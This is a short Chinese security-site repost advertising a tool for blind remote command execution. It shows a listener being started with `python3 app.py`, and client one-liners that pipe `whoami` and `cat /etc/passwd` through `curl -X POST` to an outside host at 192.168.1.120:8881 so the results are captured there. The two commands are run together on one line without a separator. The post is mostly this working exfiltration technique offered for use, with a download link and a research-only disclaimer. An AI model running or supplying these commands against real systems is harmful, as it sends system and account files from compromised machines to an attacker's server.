RCE命令无回显利用工具

admin
admin
admin
138655
文章
114
评论
2024年3月25日09:54:54评论42 views字数 339阅读1分7秒阅读模式

工具介绍

RCE命令无回显利用工具,支持在Linux、Windows下使用,渗透测试中遇到执行命令无回显的场景时可以使用该工具通过curl外带命令达到回显的效果。

工具使用

1. 服务端部署,执行以下命令:
python3 app.py
RCE命令无回显利用工具

2. 客户端请求,执行以下命令:

whoami | curl -X POST -d @- http://192.168.1.120:8881cat /etc/passwd | curl -X POST -d @- http://192.168.1.120:8881
RCE命令无回显利用工具
3. 执行结果保存在当前目录下的data.txt文件中。
RCE命令无回显利用工具
下载地址

https://github.com/shanxigetanxiaochou/curl-rce

原文始发于微信公众号(Hack分享吧):RCE命令无回显利用工具

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月25日09:54:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   RCE命令无回显利用工具https://cn-sec.com/archives/2600928.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息